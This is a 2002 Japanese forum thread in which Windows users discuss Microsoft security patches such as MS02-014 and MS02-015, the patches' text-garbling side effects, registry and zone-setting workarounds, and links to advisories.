すまん。やっぱり化けていた！

>>409
サンキュ
cab内探すのってめんどいやね

あ〜あ　先にこのスレ見ときゃＤＬしなかったのに・・
ところであの極悪欠陥商品販売会社はウンとかスンとか言わないのか？
ＤＬしてるけど気付いてない人結構多いと思うよ

入れるのは止めとくか、しかし何だかなぁ本末転倒だな。

M$からダウンロードする場合
誰かが人柱になってからだな
出たらすぐに当てるという条件反射はいかん
M$とyahooは信用できん　飛び付くとエライ目に合う
これ定説

でも、今回はバグの内容が内容だけに、入れた方がいいかと。
俺もすぐに突っ込んで激しく後悔したくちだが。

>>409
サンクス。これでとりあえず弟のマシンは直した（逃走失敗で捕まっていた）。
でも、これだとパッチが当たってない状態に戻ったってことかな。IEのバージョン
情報を見ると、パッチが当たっていることになってるけど、信用できんな。

ところで、日本語の説明ページの

＞既定では、この脆弱性はリモートで利用することはできません。
＞しかし、非常に特別な状況下では、Web ページを介してこの脆弱性を
＞利用することができる可能性があります。具体的には、ユーザーが
＞カスタム URL ハンドラがあるアプリケーションをインストールし、
＞次にアンインストールし、さらにアプリケーションのアンインストール
＞ルーチンが正常にアプリケーションを完全に削除しなかった場合、
＞攻撃者はバッファのオーバーランを発生させようとする HTML Web
＞ページを作成し、攻撃を仕掛けようとする可能性があります。

を見ると、何か凄く特異な例って気がするが、このカスタム URL ハンドラ
があるアプリケーションってどんなのかね？やっぱり問題あるのはMS製品
かな？OutlookExpとか。

windows2000sp2 IE5.5sp2 Q316059 に
問題のQ313829_W2K_SP3_X86_JA.exe
を当てたけど特に問題ないよ？

見方が悪いのかな？どこを見れば一番わかるの？

>>418
いや、ここで騒いでるのは、Win98での不具合と思われ。マイコンピュータで
適当なドライブのプロパティを表示して何もなってなければ問題ないんじゃ
ないかな？

なんか、のーてんきなヤツが、
のほほーんしてるのが、
いいのかな？っと。

こっちは、はぎしりモードだけんどもよぉｺﾞﾙｧ＞Ｍ＄

Windows Shell の未チェックのバッファにより、コードが実行される (MS02-014)
（2002年3月8日： 日本語情報、及び殆どのパッチ公開、最大深刻度 : 中）

＊悪意のある攻撃者から、未チェックのバッファを利用して任意のプログラムを
実行される可能性があるという、非常に危険度が高いセキュリティ・ホールです。
決して、マイクロソフトの記述のように「最大深刻度 : 中」ではありません。

M$から文字化けについての公式発表まだだよね？

>>419
「ドライブのプロパティ」＋「ショートカットのプロパティ」＋「ファイル名を指定して実行」

この問題って、これまでで最大の潜在的危険を伴っているんでは？！

>>425
Win2000とWin98じゃなければ、問題ないようだけど。

漏れ的にはフシアナトラップの方が痛かった。
あれは何度も泣いた。

>>426
まさにWin2Kだからねぇ・・・

>>427
SP3のベータがテスト中だと聞いたけど。
またデビューは遠くなったね。

うがー、化けちまった…日本語に直すパッチ出せ＜MS＞本末転倒だ…(T-T)

>>429
お前は>>409を読んだんかと問いたい、問い掛けたい、小一時間ほど問い掛けたい

今さっき入れたwin2k。

>>409
そんなめんどくさい事をしなくても
システムファイルチェッカー（sfc）でShell32.dllを抽出して再起動。
これで一発。

入れたらところどころ英語になっちまった

>>433
仕様だそうです。

>>433
マジっすか？

NTなんだけど、「名前を指定して実行」に別のメモリ領域で実行するチェック
ボックスがあったのが"Run in..."と英語になってる
ファイルのプロパティで「全般」が"General"で表示が全部英語になったけど
なんで「バイト」だけそのままなんだろう
ディレクトリのプロパティは「圧縮」がCompressに変わって、ドライブのは
「全般」に出るチェックボックスが"Compress C:\"というようになってる
「ツール」のタブは名前が変わってないけどチェックディスク、バックアップ、
デフラグの説明が英語に変わってる。でもボタンは日本語のまま
フォントもばらばら
これの修正版が出るとしたらq313829から番号が上がるんだろうか。だとしたら
IEの「更新バージョン」がまた増えちまうよ

Meでよかった

えーちょっと待った
なんかよくわからんけどこれって２Ｋは関係無いよね？
当てたけど別に化けたりしてないぞう

98だと化けるらしい

>>436
Win2kでは大丈夫みたい。

win2kで入れてみたけど、全然問題なし。

やっぱ２Ｋなら問題無いのか　よかった・・・

つかもうＩＥには愛想がつきた・・・
もじらにします　長い間ありがとうございました　どうか探さないで下さい

>442
今回のはIEのホールではありません。
決別したかったら、Windowsからどーぞ。

442はおもろいやつやな

>>444
多分、問題が何なのかもあまり分かっていないんだと思われ(藁

ネタなのかもね。

OSME IE6です、インストするとエラーが出てアップデート出来ません。
串もファイヤウォールも、切ってあります。
原因はなんでしょうか？
　　↓
セキュリティ問題の修正プログラム - 2002 年 2 月 14 日 (Internet Explorer 6)
309 KB/ ダウンロード所要時間: < 1 分
この修正プログラムによって、Windows Millennium Edition (以下、Windows Me)、
Windows 98、および Windows NTR 4.0 の Internet Explorer 6 に存在する「Internet Explorer
での不正な VBScript の処理によって、Web ページからローカル ファイルを読み取ることができる」脆弱性 (セキュリティ情報 MS02-009) が修正されます
。 今すぐダウンロードして、悪意のあるユーザーが不正な Web サイトを悪用して、ローカル コンピュータのファイルの内容を読み取ることができないようにしてください。
最初にお読みください

>446
WindowsInstallerのバージョンが古いのかも

MS02-014に関してwinNT4.0(ie4.0アクティブデスクトップ利用向け）用のパッチとwin98のパッチが同じダウンロード先なんですが、98が文字化けするのはこのせいですかね。

http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
は、一時的にページにアクセスできなくなっていますが、
http://www.microsoft.com/japan/technet/security/bulletin/ms02-014ov.asp
は、まだ生きてるようです（パッチ）。

450

パッチインストールしないで、被害に有った人はいますか？
居ない様な気がする。

>>451
ここにいる奴のほとんどは技術的な説明を読んでないｱﾌｫばかりだろ？
ほっとけよ。

>>451
被害にあってからじゃ遅い

>>448
Win2kで文字化けが起こらないのがなぜか、今更気付いた。

>>445
アンタ詳しい人と見た！

窓の杜の記事が書き直されてる

>>455=>>445
ていうか自作自演と見た！

インターネットオプションのページでマイコンピュータが表示されないと
危険らしいのですが、うちでは表示されません。どうすれば表示されますか？

>>458
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\flags
の値を32引いたものにする。
俺のマシンは1

http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-014
復帰。ただし、
＞* Windows NT 98/98 Second Edition 用の修正プログラムに関しましては
＞現在ダウンロードを停止しております。準備ができ次第、このページにて、
＞お知らせします。
との事。要するに、文字化けバグ直し中ってことかな？

>>459
サンキュ

Windows Shell の未チェックのバッファにより、コードが実行される (MS02-014)
（2002年3月8日： 日本語情報、及び殆どのパッチ公開、最大深刻度 : 中）
　＊悪意のある攻撃者から、未チェックのバッファを利用して任意のプログラムを実行される可能性があるという、
非常に危険度が高いセキュリティ・ホールです。決して、マイクロソフトの記述のように「最大深刻度 : 中」
ではありません。

はよ文字化けバグ直せやマイクソ！！

マイクソ
XBOX の対応で、ラオックス、サトウが、販売中止したように、
毎糞は、家電やゲームなどに、入り込む場所は ありません。
彼（ゲイツ）には「お客さま」という意識が無いのですから。

そんなに言うんだったらwindows使うのやめろよ

とたんにサクサク、WARPを使え。

＞４５８
ええええ？？
どゆこと？？ＩＥの設定メニューの中にってこと？

>>467
セキュリティのタブ

えええええええ！？
無いよそんなの最初ッカラ

インターネット
イントラネット
信頼済みサイト
制限付きサイト

こんだけ。
皆は違うの？

>>469
ログ嫁

あんまり古いところの >> を示すなよ
いちいちそこまでたどることは、
やらないんでね

2002 年 2 月 11 日 Internet Explorer の累積的な修正プログラム (MS02-005)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-005

XMLHTTP コントロールにより、ローカル ファイルにアクセスすることができる (MS02-008)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-008

Internet Explorer の不正な VBScript 処理により Web ページがローカル ファイルを読み取る (MS02-009)
http://www.microsoft.com/japan/technet/security/frame_prekb.asp?sec_cd=MS02-009

>>307 Java アプレットがブラウザ トラフィックをリダイレクトする（MS02-013）
http://www.microsoft.com/japan/technet/security/bulletin/ms02-013ov.asp
参考記事として
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020305/1/

>>457
違うんだけどな・・・(´･ω･`)ｼｮﾎﾞｰﾝ

>>471
氏ね。
自分で調べないやつは、ここ見るなよ。

とりあえず>>459さんのレスを見てやってみました。
要するにこれでローカルでも Java とか ActiveX とかが
動かなくなるように出来るわけですか。ふむ。

おぅ!!
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
のDWORD値"Flags"のデータ値を"1"にしたらインターネットオプションのセキュリティタブ以下に、
いままで無かった「マイコンピュータ」のアイコンが!!!
こんなのいまさら知った…
おかげでばっちり設定しました。イエイ!!

>>459
情報サンクス子!(･∀･)

＞HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
＞のDWORD値"Flags"のデータ値を"1"･･･
これをやるとNorton Antivirusとかおかしくならない？

どういうふうに？

あ！
スクリーンセーバが動かなくなったヽ（´ー｀）ﾉ
仕方ないな　もっと地味な奴に変えよう

ネット観覧してると、いきなりＦＤが起動してフリーズします。
ＩＥの故障かと思い修復したのですが、やはり同じ症状が起きます。
ＩＥ６ダウソしてから、起るような気がします、パッチは当ててません。
原因なんでしょうか？

ほらよっ

http://www.microsoft.com/JAPAN/support/kb/articles/J052/9/81.asp
5とか6とかのゾーンも自作できるのかな?
しっかし、不明つーのはなんなんだぁぁぁぁ

MS02-014の98用のパッチはもう当てても大丈夫？

調節がムズイ(;´Д｀)
あんまり使いづらいんで多少緩めちまった

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0
のDWORD値"Flags"のデータ値を"1"にしてセキュリティのマイコンピュータの設定でActiveXとかjava関係
を全部無効にした状態でNAVを立ち上げると、状態の項目が更新中になったり手動でスキャンしようとしても
動かないんだけど、NAV自体は正常に機能してるのかな？今は安全なActiveXとjavaスクリプトだけ有効に
してます、この状態ならNAVも機能してるかな。

>>482
まだダメでしょ。てゆうか、まだ公開停止中では？

マイコンピュータの設定を下手に変えると、
Explorer及びシェルのさまざま機能、HTMLヘルプ、システム情報
などなどが正しく動かなくなるけど、知らないわよ。

手動でスキャンしてみた。確かに異常jに時間かかって
変だった。けど結局ちゃんと終わって結果も表示されたよん。
これで良しとすべきかどうか。。

マイコンピュータのセキュリティの設定は
●AciveXコントロールとプラグインの実行
●スクリプトを実行しても安全だとマークされているActiveXコントロールとプラグインの実行
●アクティブスクリプト
だけ有効にして、それ以外は無効にしてる。これでNortonは普段通り動いてる
感じに見えるけど、これで他に不具合が出ないかどうかは分からない。

早速マイコンピュータの設定を見てみると
Javaの許可と安全でないActiveXコントロールのところ以外
全部有効、最高にゆるゆるの状態になっているんですけど
これってみんな初めはこうなんですか？

ていうか最初はウィンドウが開けなくなったりしたぞ(w
で、「ダイアログ表示させる」にしてみたけどこれもまたいちいち聞いてきてメンドイ(;´Д｀)

あんまり使いにくいんで結局全部元の状態に戻した
考えてみれば必要ない。

かも…



(と、付け加えてみる)

今までは、HDに保存したHTMLファイルはイントラネットのセキュリティで
実行されるのかと思っていた。HDに保存したUGサイトやアダルトサイトとかを
何回かIEで表示させちまったよ、、、。でJavaScriptもActiveXも全部切っ
てあるのに、ポップアップウィンドウがでてバナーが表示されたりしておかしいな？
とは思っていた。

CATVだから国際回線やQ2の心配はないからいいし、今のところ不具合はないけど、
ひそかにとトロイ仕込まれていたりしないか心配だ。
結構オンラインショッピングとかやっているからな、、、。クレジットカード番号が
心配。Q２とか国際回線の被害にあった人の話はよく聞くけど、ネットショッピング絡みで
クレジットカード番号を盗まれて被害にあった人というのはどのぐらい存在するのでしょうか？

マイクロソフトも最初からマイコンピューターの表示しといてほしかった。
そりゃ、マイコンピューターのセキュリティを厳しくしたら、トラブルがいろいろ起きて
使ってられんだろうけどとりあえずHDに保存したHTMLに対して、イントラネットの
セキュリティなんて誤解をすることがなしに、万全の注意を払うのに。
あー、鬱だ。鬱だ。いまさらだけど今週末にOSの再インストールでもするかな。

長文アンドなんの建設性もない愚痴でｽﾏｿ。

↑ていうか定期的にスキャンしてんだろうが
それでもまだ心配なのか???
じゃあお前はいったい何なら信用できるんだ???

理解不能だ

オレはもうダメだ。
テキスト修正でも日時が更新されて上に上がってくるので、
もうどれをダウンロードしていいのかわからなくなった。
せめて修正パッチの更新日時一覧表を作れや、ＭＳ氏ね

>>494
累積パッチとそれ以降に出たパッチを入れればいい。
ダブってもいいからもう1回入れる。

>>494 禿胴
オレはOperaにした。MS02-008のIE６用パッチがでなかなか出ないので
もう我慢できない。
ただOperaは半角カナでカキコしても全角になってしまう。

半角カナじゃなくてもざー２とかなぜか書き込めなかった＜Opera
あと、ＮＩＳを使ってると突然ブルースクリーンになったりした

>>497 スレ違いだが、Operaに http://www.moonstone.jp/ のパッチ当ててみた？

>>498　いや、膳々。こんなのあったのか。さんくす。

＞４９７
スレ違いヤメレー

SNMP サービスに含まれる未チェックのバッファにより、任意のコードが実行される (MS02-006)
http://www.microsoft.com/japan/technet/security/bulletin/MS02-006.asp

パッチでました。

というか、SNMPってなんですか?(汗

http://www.forest.impress.co.jp/article/2002/03/11/windowsbug.html
なお同社では、8日の時点でWindows 2000用のほかに、
Windows 98/NT 4.0用の修正プログラムを公開したが、
Windows 98/NT 4.0にこの修正プログラムを適用すると
“ファイル名を指定して実行”などの一部のダイアログで文字化けが
生じる不具合が見つかり、11日深夜になって公開を中止した。
同社によると、不具合を直した新しい修正プログラムは現在開発中で、
数日中に公開する予定だという。

このスレの人柱さん達に敬礼ッ・・・
(´･ω･`)ｼｮﾎﾞｰﾝ

NTに入れたらところどころ英語になったんだけどなあ

>>481
ゾーンの自作はできるらしい
以前Win板で見かけた

あっ、私のパソの文字化けひょっとしてこのせいなのかな？？
マイコンピュータの「Ｃのプロパティ」の画面が一部変な
文字になってるんだよね。
全然関係ないか。

http://www.nai.com/japan/virusinfo/virE.asp?v=Exploit-CodeBase&menu=ThisPagePrintVersion

「xploit-CodeBaseとは、Microsoft Internet Explorerのデータバインディング脆弱性を検出したときの一般的な検出名。この脆弱性は２００２年２月２５日に発見された。」って書いてる。
これってMS02-009のことか？日付が。

>>506 3/8時点でパッチは無いっていってるから違うだろ。
つかhttp://ime.nu/www.nai.com/japan/virusinfo/virE.asp?v=Exploit-CodeBase&menu=ThisPagePrintVersion
とMS02-009は俺の貧弱な感性ではどうしても繋がらないんだが。

MS02-014のパッチが再発行されたよ!!
http://www.microsoft.com/japan/technet/security/bulletin/MS02-014.asp


変更履歴
2002/3/8: このセキュリティ情報ページを公開しました。

2002/3/15: この問題に対する Windows NT 4.0 (Active Desktop 使用環境) および
Windows 98/98 Second Edition の日本語版修正プログラムを更新しました。
また、Windows NT 4.0 (Active Desktop を使用していない環境用) の日本語版修正
プログラムを公開しました。

>>508
ショートカットアイコンの矢印を薄くしたり、なくしたりのカスタマイズが
できないまま。

>>508
難しくてよくわかりません。
Win98でサーバー立ててないネットしかしてない人は、
パッチ当てなくて大丈夫なの？
影響なしってあるけど。クライアント システムだけ中ってあるなあ。
クライアントシステムってなんなんだろう。

>>510
2ちゃんねる→インターネットサーバー
社内サーバー→イントラネットサーバー
普通の人→クライアントシステム

多少の英語とネットワークの基礎くらい理解してきなさい

>>507
漏れ的には一瞬、アリだと思ったんだけど。
「実行ファイルが起動」、という説明と日付、引っかかって。

>>509
禿同　困ったな

>>509
>>513
Win9Xなら、環境設定ってフリーソフトで、ショートカットの矢印が消せる。
どうやらTweakUIと違う事やってるようなので、TweakUIで効かなくても、
こっちで消せた。当方Win98SE。

ttp://www5a.biglobe.ne.jp/~nobukich/index_j.htm
↑ここからﾀﾞｳｿ。

>>514
消すんじゃなくて薄くしたいニダ
TWEAKUI.CPLの薄いショートカットアイコンにしたいニダ
窓の手で出来てたけどディフォルトの濃いショートカットアイコンになるニダ
たぶんレジストリ見ないでシュートカットアイコンかぶせてるニダ
バグか仕様かかわらんニダ
たぶんＭＳはサポート外で仕様と言うニダ
いやだニダ

>>515
各ショートカットアイコンを薄い矢印付きで自作して、システムが付ける矢印は
消す。

うーん。514で挙げたツール以外の環境変更ツールで、薄い矢印付けるってのは
無いかな？オレは矢印消す人なんで、困らないから探す気無いんだが…。

オンラインスキャンしたら
JS_EXCEPTION.GENに感染してました。
特に症状っぽいのは今のところでてませんが
今から駆除ります。
だれか、症状がでたという人がいたら
どんな症状なのか教えてください

>>517
聞く前に検索してみるという知恵はまわらんのか?
http://www.google.co.jp/search?hl=ja&ie=Shift_JIS&oe=Shift_JIS&q=JS_EXCEPTION.GEN&btnG=Google+%8C%9F%8D%F5&lr=lang_ja

>>517
マルチだったのか

MS02-014
＞この修正プログラムがマシンに正しくインストールされたことを確認するために
＞は、［スタート］、[ファイル名を指定して実行] を選択し、QFECheck ユーティ
＞リティを起動してください。修正プログラムがインストールされている場合は、
＞インストールされた修正プログラムのリストに "Windows 98 Q313829 Update"
＞が表示されます。

正常にインストールされましたって窓が出たんだけどQFECheck ユーティリティを
見ても0313829が表示されてない。これってやっぱりインストールされてないですよね？心配です。

IE のバージョンを見れ

>>520
qfecheckにファイルの検索がある

>>522
qfecheckでsearchしてもqfecheckには追加されませんね

ieのバージョンにq313829と追加されていることを確認できます。

詰めが甘いねＭＳは

同意
ほんとにＭＳはクソ
いまごろｑｆｅｃｈｅｃｋしても確認できないというクレーム
が寄せられていると思われる
次のお詫び文出るまで何日かかるのでせうか？（ｗ

>>522は疑問と質問の意味が解ってないと思われ

MSのヘルプデスクでフィドバックフォームに記入して
送信できないよ
こないだはできたのに
クレーム受付拒否か？　ＭＳは

[2453] Re: およよ。
naoco さん 2002/03/17(Sun) 22:28
[f-kyoto-215072.zero.ad.jp] Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)

ドコモの子会社で働いてたころ、
PHSには今後力をいれんって力説された覚えが。

展示会とかでも、PHS用の場所って畳1枚分もなかったし。

>>520
その文章↓のように書き換えられてるよ。まるで何事もなかったかのように・・
ほんとクソ会社だな　北朝鮮以下だ

＞Windows 98 および 98 SE :
この修正プログラムがマシンに正しくインストールされたこと
を確認するためには、c:\windows\system フォルダにある
Shell32.dll のバージョン情報を確認してください。
修正プログラムがインストールされている場合には、
Shell32.dll のバージョンが、4.72.3812.600 になります。

やっぱりバックレたな　

MSクソだな、あ〜Macが欲しい

>>528
漏れMSは信頼してないけど。
「より快適に使うためのアップデートです」、なんてふざけた名目で、密かにパッチ当てさせる某社の方が嫌だ。

>>528 532
今回の件や
http://news.2ch.net/test/read.cgi/newsplus/1016455358/
でＭＳほんとに嫌いになった
Linuxも半端だし、マクーも訳わかんない方向に行ってるし
変われるＯＳ有れば換えたい
やっぱＱＮＸしかないか・・・

>>533
超漢字とか。
でも漏れ、漢字苦手だから使いこなせそうにないか（鬱

http://www.lac.co.jp/security/intelligence/SNSAdvisory/48.html

Microsoft Internet Explorer 6 には、さまざまな環境下において
ユーザの意思に関係なく、ファイルを自動的に ダウンロードし、
かつ、それを自動的に実行してしまう問題があります。
悪意ある Web サイトの管理者はこの問題を利用することのできる
悪意あるコンテンツを設置し、ユーザが Internet Explorer 6 を利用して
このコンテン ツにアクセスした場合に、
この管理者が指定した任意のプログラムはユーザのシステム上に
自動的にダウンロードされ、かつ、自動的に実行されてしまう可能性があります。

回避策:
インターネットオプション]から適切なゾーンに対して
[ファイルのダウンロード]を無効にすることでこの問題を回避することができます。

ﾏﾀｶ

http://itpro.nikkeibp.co.jp/free/NBY/NEWS/20020319/1/

はよパッチ用意せんかい！
相変らずダンマリを決め込むのは体質だな　コメントくらいさっさと出せ！
↑のように文章の差し替えも隠れてやるし
陰険な会社だ　はよつぶれろ！　
奢れる者久しからず　満つれば欠くる　祇園精舎の鐘の声・・

これは仕様です　これは仕様です　これは仕様です

これは仕様です　これは仕様です　これは仕様です

これは仕様です　これは仕様です　これは仕様です

これは仕様です　これは仕様です　これは仕様です

これは仕様です　これは仕様です　これは仕様です

どっかのスレで、マイクロソフトは今月はバグ取り強化月間って見たなあ。
バグ強化月間だったのか(ﾜﾗｴﾅｲ

みなさん、こんばんは。
明日の夜から、札幌に行きますので、靴日記等の更新は２４日まで出来ない可能性が高いので、ご了承願います。
掲示板には、登場するつもりです。
宴に履く靴は決めていないのですが、普段履き用はやはりウェストンのゴルフにほぼ決定しました。
頑丈で連続着用にも耐えますし、カジュアルには丸みを帯びたシルエットがとてもマッチします。
フッ素加工アッパーとラバーソールで完全武装されているので、どんな天気でも気にしないですみます。
とにかく、この靴さえあれば、カジュアルには安心です。
・・・、でも、宴の当日に雨が降ったら困るので、ロジェにしようかなとも、フト思いました。

>535
> 回避策:
> インターネットオプション]から適切なゾーンに対して
> [ファイルのダウンロード]を無効にすることでこの問題を回避することができます。

ちなみに、この設定やってもWindows Updateは正常に動作するんだよなぁ。
本当にこれで対策になっているのか、甚だ疑問だ。

【勝手にDLし勝手に実行！ひとりエッチ上手なIE6】
http://pc.2ch.net/test/read.cgi/sec/1016485189/l50

>>542
それはC:\WINDOWS\Downloaded Program Files内にキャッシュされた
アップデートエンジンで動作しているためでは？

>534
それはネタか？（ｗ
食わず嫌いせずにBTRONもくうだよ

うちは、アプリ少ない欠点はあるけど、
Webブラウズの専用端末としてなら、
導入してもいいかと考え中
セキュ穴ばっかで鬱になるよりもいいかな･･･と

いい日旅立ち

振り返れば奴がいる

或る日突然（トワ・エ・モア）

http://www.microsoft.com/japan/technet/security/bulletin/ms02-015ov.asp
概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-005 : 2002 年 2 月 11 日 Internet Explorer 用の累
積的な修正プログラム
http://www.microsoft.com/japan/technet/security/bulletin/ms02-005.asp
で修正された問題に加えて、新たに 2 つの問題を排除します。

MS02-008のMicrosoft XML Core Services 2.6 と 3.0　の日本語版修正プログラム
はまだか。はやくパッチかIE6.0SP1を出して欲しいぞ。

Opera使おう。もうIE使ってられないな。
IEは5か5.5か、6どれが良いんだろう。
5.5かな？

Operaは軽くて速いからいいね。IE6.0と使い分けてるよ。

「米MSがIEの新しいパッチを公開，ただし ふさげないセキュリティ・ホールも」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020329/1/

MS02-015のパッチ入れました。
今のところ不具合は無いです。

Q306121;Q313675;Q316059;Q313829;Q319182って･･･
早くSP3出しましょうよ

>>550
同志！！！

>>550
>>556
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020322

>>552
Operaは文字化けパッチやお気に入りなどの問題があって面倒だなあ。

ネスケ仕様のドーナツが出たら一番いいんだが。

>>557
ありがと。多謝なんだけど。
じゃなくて漏れが今MS02-008入れてないのは、technetで「入れてもいいけど、SP出るまで待ったほうがいいかも」的な表現だったからで。この自信無さげな文章、心に引っかかって。

「IE6SP1期待アゲの会」に一緒に入りませんか？

インプレス関係から記事が消えた．．．

MS側の不手際で取り下げ？もうインストールしたのに．．．

>>552 お気に入りはインポートできまっせ。IEと併用してるのでしょっちゅう
インポートして同期してます。
漏れも「IE6SP1期待アゲの会」賛成！

InternetExplorerの深刻なセキュリティホールを修正する累積的な修正プログラム


ZDNN：速報：MS，IEのセキュリティホール修正パッチを公開
http://www.zdnet.co.jp/news/bursts/0203/29/04.html

今回リリースされた修正パッチは，「危険度中」とされる
「悪意のあるユーザーが指定したプログラムを自動的に実行することができる」に加え，
「危険度高」の「IEのゾーン判定を回避して不正なゾーンでスクリプトを実行することができる」
という深刻なセキュリティホールを修正するもの。

MS02-015 に関する情報
http://www.microsoft.com/japan/technet/security/bulletin/ms02-015ov.asp?frame=true

この修正プログラムは、Internet Explorer に影響を及ぼす
セキュリティ上の問題を排除する累積的な修正プログラムです。
以前に公開されたMS02-005 : 2002 年 2 月 11 日 Internet Explorer 用の
累積的な修正プログラムで修正された問題に加えて、新たに 2 つの問題を排除します。


（対象となる製品）

Internet Explorer 6
Internet Explorer 5.5 Service Pack 2
Internet Explorer 5.5 Service Pack 1
Internet Explorer 5.01 Service Pack 2 (WWindows 2000 、Windows NT4.0 に組み込まれているもののみ)
注意: Internet Explorer 5.01 Service Pack 2 の修正プログラムは、Windows 2000 、Windows NT4.0
Service Pack 6a 環境でのみ適用可能です。

（詳細）

ディスク上の任意のファイルの読み取ります。
意図しないスクリプトが実行されます。
アプリケーションが実行されます。 (ハードディスクのフォーマットなど)
Windows が異常停止します。

>>562 超ガイシュツと思うけど…

人柱くんの報告では特段不具合が出てないみたいだから
新しいパッチ当てたわな

みずほ銀行誕生、システムは大丈夫か？
５８１店・３万人・７０兆円…処理が最大の懸案
　日本興業、第一勧業、富士の３行が来月１日から、「みずほ銀行」と
「みずほコーポレート銀行」に再編される。メガバンク誕生前夜、看板
かけ替えやパンフレット入れ替えなど休日返上で新たな船出に備えるこ
とになる行員も多い。なかでも最大の懸案はコンピューターシステムの
統合だ。「Ｙ２Ｋ並みの勤務態勢で万全を期す」（広報担当）と緊張が
高まっている。

ファイルの自動ダウンロード、実行問題は修正されず


http://www.forest.impress.co.jp/article/2002/03/29/iepatch.html

Internet Explorer 5.5 SP2
- http://www.asia.microsoft.com/downloads/release.asp?ReleaseID=32082
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-009.asp
- http://www.microsoft.com/japan/technet/security/bulletin/ms02-015.asp

Internet Explorer 6
- http://www.asia.microsoft.com/japan/ie/downloads/ie6/
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-008.asp (Windows Update)
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-009.asp
- http://www.microsoft.com/japan/technet/security/bulletin/MS02-015.asp

後ろ向きな追加対策
- インターネットゾーン - ダウンロード「無効」(Irvine 等で代用)
- regsvr32 /u mstime.dll 元に戻す場合 regsvr32 mstime.dll
- スクリプト切るとポータル系が見れないという苦情がウザイので切らない

前向きな追加対策
- Interscan の導入
- 一時的に Netscape 6.2 へ移行

> - regsvr32 /u mstime.dll 元に戻す場合 regsvr32 mstime.dll
対応済み
> - スクリプト切るとポータル系が見れないという苦情がウザイので切らない
切らなかったらmstimeを切ってもまったく意味ないだろ
少しは自分の頭で考えられんのか

IE６なんですけどこれなんとかなりませんか？
q306121;q312461;q313675;q316059;q319182
IE６のSP１っていつ出るんですか？

>>569は知的障

>569
q313829は？

>>569
多分当分出ない

>>568
スクリプト切りは強制しないが自己の判断でやってくれっつーことで。
html + time は強制切りしないとスクリプト切りやっても意味ないでしょ。

で、こうするよ。

- パッチ適用のみで他の対策無し
- 喰らったら喰らったで、喰らったやつの責任。自分でどうにかしろ
- virus detect 時、SMTP traffic は Outbound Block

他所様に迷惑かけない仕様。ダメけ?

対応済みって MS02-005 かぁ。調査不足ｽﾏｿ｡

すでにリリースされていたXML Core Services 2.6 および 3.0 の日本語版修正
プログラム(MS02-008)が正式に公表された。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS02-008

この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。
・ Microsoft XML Core Services 4.0:
http://download.microsoft.com/download/xml/Patch/Q317244/W9X2KMeXP/JA/msxml4qfe.exe
・ Microsoft XML Core Services 3.0:
http://download.microsoft.com/download/xml/Patch/3.0/W9XNT4MeXP/EN-US/Q318203_MSXML30_x86.exe
・ Microsoft XML Core Services 2.6:
http://download.microsoft.com/download/xml/Patch/2.6/W9XNT4MeXP/EN-US/Q318202_MSXML20_x86_en.exe

OSが98SE、ブラウザがIE6.0の場合、
3.0を入れればいいんですよね？

>>576
そうです

http://www.forest.impress.co.jp/article/2002/04/02/xmlcoreservicepatch.html

自分の環境に「MSXML」がインストールされているか確認する最善の方法は、
Widowsのシステムディレクトリに「MSXML」の関連ファイルがあるか確認すること
だという。

具体的には“C:\Windows\system32\”または“C:\Winnt\system32\”に、
“MSXML2.DLL”というファイルがあれば「MSXML」v2.6が、“MSXML3.DLL”という
ファイルがあれば「MSXML」v3.0が、“MSXML4.DLL”というファイルがあれば
「MSXML」v4.0がインストールされていることになる。修正プログラムは「MSXML」
のバージョンごとに別々のファイルで公開されており、複数のバージョンの「MS
XML」がインストールされている場合は、それぞれ対応する修正プログラムを
適用しておく必要がある。

　↑
　自分の場合は、C:\Windows\system32ではなく、C:\Windows\systemに
ありました。
　ちなみに、OSは98SE、ブラウザはIE6.0です。

>>577、>>578
さんくす。

>>579
私も探してみたらC:\Windows\systemにありました。
以前C:\Windows\system32を探して無かったから念のために聞いたのですが。
M$のあほー。

Javaのセキュリティホールって確かプロキシの問題だけだったはずだけど
いつのまにかバイトコードベリファイアの問題が追加されてる。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/MS02-013.asp
http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/218&type=0&nav=sec.sba
http://home.netscape.com/security/
これはサンドボックスを突破してコードを実行できるというもので
MS02-013は危険度が「高」に変わってる。
国内ソースでこれを報道したものってある?

>579,580
なるほど・・
system32になかったから関係ねーやと放っておいたのだが
確かにsystemで検索すればMSXML3が出てきたわな
それにしても謎めいた会社よのう　危険度高の割りには　
このスレ見なきゃ放置だったよ　オレみたいなトーシロは・・

まあ、エキスプローラで「MSXML*」を検索したほうがいいってことですな。

他のスレで既出かもしれないけど。

IE6丸ごと入れたCD-Rを家に忘れたんで、職場でIE6をDLしようとした。
「ダウンロードの場所情報は壊れています。IEブラウザのキャッシュをクリアにしてから、セットアップを再実行してください」
「ダウンロードサイトの情報が取得できませんでした」

こんな素敵なエラーがでる。
MSに問い合わせたら、鯖が落ちていて現在復旧作業中とのこと。
早よ治さんかい。

>>584
ぁ、それと同じ質問がどっかに・・・
microsoft側のミスだったのか。

>>579,580,582

その件もまた↓のようにコッソリ書き換えしてやがんの
昨日までsystem32で調べろとしか書いてなかったのに（ｗ

＞修正プログラムの適用が必要かどうかの判断には、よく寄せられる質問
